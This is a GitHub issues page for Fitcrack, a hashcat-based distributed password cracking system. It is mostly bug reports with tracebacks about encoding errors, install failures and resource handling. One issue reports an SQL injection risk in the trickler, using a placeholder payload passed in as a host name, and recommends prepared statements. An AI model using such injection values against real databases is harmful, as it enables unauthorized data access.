nesfit / fitcrack Goto Github PK
View Code? Open in Web Editor NEWA hashcat-based distributed password cracking system
Home Page: https://fitcrack.fit.vutbr.cz/
License: Other
A hashcat-based distributed password cracking system
Home Page: https://fitcrack.fit.vutbr.cz/
License: Other
Hi, when I try to upload a mask file which contains invalid masks (for example ?:?*?=?)
), then Webadmin does not reject this and accepts this file.
The Add Job UI properly rejects this.
Seems the regex here does not properly validate masks.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
Hello, I am struggling to get the latest dev version running, I get the error:
"The server could not verify that you are authorized to access the URL requested...."
The apache error logs show "Invalid JWT error: Invalid header padding"
Python 3.8.10
Flask 2.0.3
Werkzeug 2.0.3
Hello. I found this issue in tandem with issue #67. When I try to upload a dictionary containing non-ASCII characters and enable "Sort on upload", Fitcrack gives an "An unhandled exception has occurred." error.
As can be seen in the error log, this part of code is responsible for the bug.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/functions.py
Lines 226 to 241 in f2a0232
open
function opens the file in text mode and expects the file to be in ASCII encoding. Since the input file contains non-ASCII characters, reading from the file will eventually raise a UnicodeDecodeError
. However, this exception is unhandled and thus causes the "An unhandled exception has occurred." error message to appear.
What's more, given the ungrateful exit caused by the unhandled exception, the dictionary will be only half-added, leaving an orphan file and blocking the adding of a dictionary with the same name, but I discuss this issue more concretely elsewhere (see issue #67).
Given that by default Python on Ubuntu 22.04.2 uses UTF-8 encoding for files created by the open
function, I assume Fitcrack somehow changes the default file-I/O encoding in Python to ASCII. This is not documented in the end-user manual, however. It does make sense, as I suppose the vast majority of software does not support non-ASCII characters in passwords.
If Fitcrack by design doesn't support non-ASCII dictionary files, I expect the error message to be something like "Dictionary file cannot contain non-ASCII characters" instead of "An unhandled exception has occurred."
However, the creation of a dictionary file with non-ASCII characters succeded (!) when trying to upload the same file with "Sort on upload" disabled. If Fitcrack truly does not support non-ASCII dictionaries, this should not been possible and an error should be raised.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
[Wed Feb 22 17:29:57.968389 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] An unhandled exception occurred.
[Wed Feb 22 17:29:57.968423 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):[Wed Feb 22 17:29:57.968429 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968434 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968439 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968444 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968449 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968454 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968459 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968463 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968468 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968473 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968478 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968482 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968487 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968503 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968508 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968513 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] l = i.readline()
[Wed Feb 22 17:29:57.968518 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
[Wed Feb 22 17:29:57.968522 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.968527 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)
[Wed Feb 22 17:29:57.968907 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] [2023-02-22 17:29:57,968] ERROR in app: Exception on /dictionary/add [POST]
[Wed Feb 22 17:29:57.968920 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] Traceback (most recent call last):[Wed Feb 22 17:29:57.968926 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Wed Feb 22 17:29:57.968931 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] rv = self.dispatch_request()
[Wed Feb 22 17:29:57.968935 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Wed Feb 22 17:29:57.968940 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Wed Feb 22 17:29:57.968945 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Wed Feb 22 17:29:57.968949 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = resource(*args, **kwargs)
[Wed Feb 22 17:29:57.968954 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Wed Feb 22 17:29:57.968958 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Wed Feb 22 17:29:57.968963 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Wed Feb 22 17:29:57.968968 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = meth(*args, **kwargs)
[Wed Feb 22 17:29:57.968972 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Wed Feb 22 17:29:57.968977 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] resp = f(*args, **kwargs)
[Wed Feb 22 17:29:57.968981 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/dictionary/dictionary.py", line 165, in post
[Wed Feb 22 17:29:57.968986 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] sorted_cp(dict_path, dict_path + '_sorted')
[Wed Feb 22 17:29:57.968991 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/functions.py", line 232, in sorted_cp
[Wed Feb 22 17:29:57.968995 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] l = i.readline()
[Wed Feb 22 17:29:57.969000 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] File "/usr/lib/python3.10/encodings/ascii.py", line 26, in decode
[Wed Feb 22 17:29:57.969004 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] return codecs.ascii_decode(input, self.errors)[0]
[Wed Feb 22 17:29:57.969017 2023] [wsgi:error] [pid 22448] [remote 192.168.56.1:1095] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe9 in position 4: ordinal not in range(128)
Call me stupid, but I don't understand what to install on a client node, that it receives work from the master
Hello,
While trying to setup the Docker version with the comments next to the ports the compose up errors with this:
ERROR: The Compose file './docker-compose.yml' is invalid because:
services.fitcrack_server.ports is invalid: Invalid port "5000" # Port for WebAdmin backend (5443 for SSL):5000", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]
services.fitcrack_server.ports is invalid: Invalid port "80" # Port for WebAdmin frontend (443 for SSL):80", should be [[remote_ip:]remote_port[-remote_port]:]port[/protocol]
Hi,
I was trying to make a PCFG from the default "honey.txt" dictionary in Webadmin, I get an "Unhandled exception has occurred".
I found the root cause of the issue:
The PCFG endpoint tries to calculate the keyspace of PCFG.
The code that performs this calculation does this by calling an external script pcfg_mower.py
; it then also clamps the value returned by the script to sys.maxsize
.
However, with the "honeynet.txt" dictionary, shellExec
returns an empty string instead of a string with the number representing the keyspace. Then the integer conversion int(pcfgKeyspace)
fails and raises a ValueError, which is unhandled.
If I try to run pcfg_mower.py
with the "honeynet" PCFG manually, I get this error:
Traceback (most recent call last):
File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 160, in <module>
pcfg_mower(config)
File "/var/www/html/fitcrackAPI/pcfg_mower/./pcfg_mower.py", line 81, in pcfg_mower
if rules.load_alpha():
File "/var/www/html/fitcrackAPI/pcfg_mower/rules.py", line 74, in load_alpha
for rule in f:
File "/usr/lib/python3.10/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe3 in position 1783: invalid continuation byte
So the pcfg_mower.py
script crashes with the "honeynet" PCFG, thus never writing anything to standard output, and shellExec
thus returns an empty string. shellExec
also doesn't check the return value of the run shell command, so the issue becomes apparent only once Webadmin tries to convert the returned empty string to an integer.
As to why the pcfg_mower
script fails: The PCFG generated from the "honeynet.txt" dictionary seems to contain invalid UTF-8 bytes. And indeed, if we take a look at the honeynet.txt
dictionary, on line 1218, there is the password "N�o" (hex 4E E3 6F). E3 in this context is an invalid UTF-8 byte, causing decoding to fail. E3 here probably represents some character from an extended-ASCII character set, or it could be junk data—I don't know the supposed encoding of the "honeynet.txt" file.
Looking at the offending code in the pcfg_mower
script,
fitcrack/webadmin/fitcrackAPI/pcfg_mower/rules.py
Lines 68 to 80 in 5a2f48e
we can see that the file encoding is manually set to utf-8
. It seems it was set to UTF-8 in response to a similar bug with the "darkweb2017" dictionary (52b32a0). This causes the file-read operations to fail with non–UTF-8 files.
A better way would probably be to use open(fname, 'r', encoding="ascii", errors="surrogateescape")
as described in the Python docs on how to handle files with unknown encodings, as this way offers both universal-new-line support for file objects and treats each byte as its own character.
So this issue is quite similar to issue #66, where a Webadmin function expects a file to be in ASCII. I'd wager there are more issues like this in the Python code—it's probably best to inspect every instance a file is opened .py
files.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
[Thu Mar 23 13:39:03.887840 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] /var/www/html/fitcrackAPI/src/../pcfg_mower/pcfg_mower.py -i /usr/share/collections/pcfg/honeynet
[Thu Mar 23 13:39:05.895016 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] An unhandled exception occurred.
[Thu Mar 23 13:39:05.895059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.895086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.895093 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] rv = self.dispatch_request()
[Thu Mar 23 13:39:05.895099 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.895106 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.895113 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.895119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.895125 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.895132 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.895138 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.895144 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.895150 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.895157 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.895163 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.895170 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.895177 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.895183 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.895189 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''
[Thu Mar 23 13:39:05.943002 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] [2023-03-23 13:39:05,934] ERROR in app: Exception on /pcfg/makeFromDictionary [POST]
[Thu Mar 23 13:39:05.943059 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] Traceback (most recent call last):
[Thu Mar 23 13:39:05.943075 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Thu Mar 23 13:39:05.943086 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] rv = self.dispatch_request()
[Thu Mar 23 13:39:05.943094 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Thu Mar 23 13:39:05.943102 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Thu Mar 23 13:39:05.943110 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Thu Mar 23 13:39:05.943119 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = resource(*args, **kwargs)
[Thu Mar 23 13:39:05.943127 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Thu Mar 23 13:39:05.943174 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Thu Mar 23 13:39:05.943186 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Thu Mar 23 13:39:05.943195 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = meth(*args, **kwargs)
[Thu Mar 23 13:39:05.943204 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/usr/local/lib/python3.10/dist-packages/flask_restx/marshalling.py", line 244, in wrapper
[Thu Mar 23 13:39:05.943212 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] resp = f(*args, **kwargs)
[Thu Mar 23 13:39:05.943220 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 203, in post
[Thu Mar 23 13:39:05.943228 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] pcfg_keyspace = calculateKeyspace(dict.name)
[Thu Mar 23 13:39:05.943236 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/functions.py", line 65, in calculateKeyspace
[Thu Mar 23 13:39:05.943255 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] if int(pcfgKeyspace) >= INT_MAX:
[Thu Mar 23 13:39:05.943273 2023] [wsgi:error] [pid 956] [remote 192.168.56.1:16439] ValueError: invalid literal for int() with base 10: ''
Hi. If I try to add a Markov file or a mask set with a filename that was used in the past but has since been deleted1, the upload fails with a "File with name test_add.hcmask already exists. Path: /usr/share/collections/masks/test_add.hcmask" error. This behaviour only happens with Markov files and mask sets; other resource files in the Library tab (dictionaries, PCFGs, rules, and charsets) do not exhibit this behaviour.
From what I can see, the problem happens because the code for the delete API endpoints does not remove the actual file.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/endpoints/masks/masks.py
Lines 105 to 116 in f2a0232
Code for the delete endpoints that do not exhibit this problem does perform a file-deletion operation. Like here in the charset
endpoint.
If there is no reason for keeping the resource files after deleting them, I expect to be able to reuse filenames without issue. If there is a reason for this behaviour, I expect this to be documented and a more graceful error message to appear.
Given the former is probably the case and that the issue is probably caused by forgetting to add the file-deletion code, I also opened a pull request (#69) that should fix this issue if it really is that simple.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
Deleted using the delete button in Webadmin. ↩
Hello,
I have the same case as #14
I did as mentioned here https://nesfit.github.io/fitcrack/#/guide/hosts?id=using-the-command-line
But step 4. never happens (That's all, your host will soon appear in Webadmin)
I am in the server http://static.ip_address.clients.your-server.de/hosts and the list is always empty.
BR
Hi Team,
Please have a look.
I did all listed here https://github.com/nesfit/fitcrack/blob/master/INSTALL-Installer.md#instubu22
Then I created a folder, make a git clone, and start
Hi,
I've tried to add an host, everything is fine client side, I can see the confirmation but on server side no hosts are added.
BOINC manager shows the project correctly.
Looking for general thoughts on where to look next. I've tried installing fircrack over a few different methods and all are coming up to this error.
I've tried the docker version and the installer version on ubuntu server 20 and 22 but all come to the same error. Because at this point i am just trying to get the service up and running, i have changed no defaults within the .env and left with localhost and same for the installer version. No errors when going through the build phase or the installation. When jumping onto the webpage "http://localhost/login" I get the error about the API not being available. When trying to debug via docker instructions, i can confirm that an error page is present on the 5000 port "internal server error" rather than something working. I'm including some of the log snippets here from the apache log that may be relevant.
Also checked service. Fitcrack was inactive when checked but when brought up to be active but no change in behavior of the WebAdmin on 5000.
[Mon Mar 06 20:57:27.872708 2023] [core:notice] [pid 23491] AH00094: Command line: '/usr/sbin/apache2' [Mon Mar 06 20:58:05.931414 2023] [mpm_prefork:notice] [pid 23491] AH00170: caught SIGWINCH, shutting down gracefully [Mon Mar 06 20:58:06.106869 2023] [mpm_prefork:notice] [pid 23627] AH00163: Apache/2.4.52 (Ubuntu) mod_wsgi/4.9.0 Python/3.10 configured -- resuming normal operations [Mon Mar 06 20:58:06.106936 2023] [core:notice] [pid 23627] AH00094: Command line: '/usr/sbin/apache2' [Mon Mar 06 20:58:39.051592 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:39.052016 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:39.053251 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] Traceback (most recent call last): [Mon Mar 06 20:58:39.053295 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in <module> [Mon Mar 06 20:58:39.053303 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from app import app as application [Mon Mar 06 20:58:39.053310 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in <module> [Mon Mar 06 20:58:39.053315 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace [Mon Mar 06 20:58:39.053322 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in <module> [Mon Mar 06 20:58:39.053328 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] from src.database import db [Mon Mar 06 20:58:39.053334 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/var/www/html/fitcrackAPI/src/src/database/__init__.py", line 8, in <module> [Mon Mar 06 20:58:39.053340 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] db = SQLAlchemy() [Mon Mar 06 20:58:39.053346 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 754, in __init__ [Mon Mar 06 20:58:39.053352 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] _include_sqlalchemy(self, query_class) [Mon Mar 06 20:58:39.053371 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 108, in _include_sqlalchemy [Mon Mar 06 20:58:39.053377 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] for key in module.__all__: [Mon Mar 06 20:58:39.053392 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:47150] AttributeError: module 'sqlalchemy' has no attribute '__all__' [Mon Mar 06 20:58:41.082267 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'. [Mon Mar 06 20:58:41.082367 2023] [wsgi:error] [pid 23628] [remote 127.0.0.1:60056] mod_wsgi (pid=23628): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
Hi,
On one of my test workstations, the integrated intel graphics reports utilization and temperature of -1. This causes the trickler process to die, as it appears to overflow to 2^64-1 when the database query is made, causing the database query to fail and the program to exit.
[2022/06/11 09:31:19] Executing command: trickler --variety fitcrack
2022-06-11 09:31:19.7255 Starting trickle handler
2022-06-11 09:31:19.7269 Got trickle-up message from hostId #2:
<result_name>fitcrack_1654952461_0_6506_1654952782_0</result_name>
<time>1654952843</time>
<workunit_name>fitcrack_1654952461_0</workunit_name>
<progress>0</progress>
<total_speed>5030128</total_speed>
<device_1_name>NVIDIA GeForce GTX 1080 Ti</device_1_name>
<device_1_type>GPU</device_1_type>
<device_1_speed>2644704</device_1_speed>
<device_1_temp>57</device_1_temp>
<device_1_util>2</device_1_util>
<device_3_name>Radeon RX 580 Series</device_3_name>
<device_3_type>GPU</device_3_type>
<device_3_speed>2206843</device_3_speed>
<device_3_temp>34</device_3_temp>
<device_3_util>0</device_3_util>
<device_4_name>Intel(R) UHD Graphics 630</device_4_name>
<device_4_type>GPU</device_4_type>
<device_4_speed>178581</device_4_speed>
<device_4_temp>-1</device_4_temp>
<device_4_util>-1</device_4_util>
Succesfully parsed workunit_name: fitcrack_1654952461_0
fc_workunit_id: 0
Succesfully parsed progress: 0
Succesfully parsed total speed: 5030128
Updating workunit progress...
Updating workunit speed...
fc_device_id 1
Inserting data to fc_device_info...
fc_device_id 2
Inserting data to fc_device_info...
fc_device_id 3
Inserting data to fc_device_info...
Database error: Out of range value for column 'temperature' at row 1
query=INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Problem with DB query: INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Shutting down now.
These database columns seem to just be signed 32-bit integers, so I think adjusting some types is all that will be necessary to correct this fault.
However, a lot of this code appears like it may be unsafe and possibly vulnerable to SQL injection, for example:
fitcrack/server/src/source/trickler.cpp
Lines 241 to 248 in 83552db
If a host maliciously reports itself with the name foo', ''); ANOTHER_SQL_QUERY_HERE; --
it may be able to perform arbitrary SQL commands against the SQL server leading to security issues.
I would suggest killing two birds with one stone and re-writing some of this to use prepared statements, as these provide more type safety, as well as prevent SQL injection attacks. (https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html, https://dev.mysql.com/doc/c-api/8.0/en/c-api-prepared-statement-interface.html, https://mariadb.com/kb/en/prepared-statement-examples/).
I would offer to help, however unfortunately neither C++ nor SQL are my strong suits :(.
I have attempted the installation of fitcrack on two different ubuntu 18.04 machines. In both instances, when I try to access http://localhost It appears to start to launch, but fails with a red network error box.
I CAN access localhost/fitcrack to access the user log in, just not the main dashboard.
I reviewed the apache2 error.log, and there are many Traceback errors in relation to flask and 'ImportError: cannot import name 'ContextVar' errors.
Is this error common in the apache2 logs? I'm wondering if there is a relation to the dashboard not launching and these errors?
We setup fitcrack to test.
how to setup fitcrack with SSL ?
BTW, we got the message as following always when visit installed fitcrack
The server could not verify that you are authorized to access the URL requested. You either supplied the wrong credentials (e.g. a bad password), or your browser doesn't understand how to supply the credentials required.
Due to some requirements I need to deploy Fitcrack on an intranet, without internet. Can you help me?
Hey there,
Cool project, but I can't get it to compile correctly. I answered the configuration questions and started compiling the server.
It says: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
For context:
sched_types.cpp: In constructor ‘SCHEDULER_REPLY::SCHEDULER_REPLY()’:
sched_types.cpp:737:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct HOST’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
737 | memset(&host, 0, sizeof(host));
| ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from ../db/boinc_db.h:40,
from config.h:24,
from sched_types.cpp:20:
../db/boinc_db_types.h:264:8: note: ‘struct HOST’ declared here
264 | struct HOST {
| ^~~~
sched_types.cpp: In member function ‘int SCHEDULER_REPLY::write(FILE*, SCHEDULER_REQUEST&)’:
sched_types.cpp:769:9: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
769 | BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
| ^~~~~~~~~~~~~~~~~~~
| ERR_MAJOR_VERSION
sched_types.cpp:769:33: error: ‘BOINC_MINOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
769 | BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
| ^~~~~~~~~~~~~~~~~~~
| ERR_MAJOR_VERSION
sched_types.cpp: In member function ‘int SCHED_DB_RESULT::parse_from_client(XML_PARSER&)’:
sched_types.cpp:1295:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct SCHED_DB_RESULT’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
1295 | memset(this, 0, sizeof(*this));
| ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from sched_main.h:21,
from sched_types.cpp:33:
sched_types.h:198:8: note: ‘struct SCHED_DB_RESULT’ declared here
198 | struct SCHED_DB_RESULT : DB_RESULT {
| ^~~~~~~~~~~~~~~
make[2]: *** [Makefile:2571: sched_types.o] Error 1
make[2]: Leaving directory '~/tools/fitcrack/boinc/sched'
make[1]: *** [Makefile:680: all-recursive] Error 1
make[1]: Leaving directory '~/tools/fitcrack/boinc'
make: *** [Makefile:584: all] Error 2
Error during compilation.
Is there an updated Dependency list for Ubuntu 20.04?
Getting a bunch of mismatches trying to install
Hey!
I was now able to test the solution and compared to hashtopolis e.g. it has a much better UI feeling. I don't know about performance yet, but you paper states it's advantages in this regard as well.
Some observations I made, or features that I miss:
The width of the password file UI is quite small. I think that's a displaying bug, that I could fix on the client side.
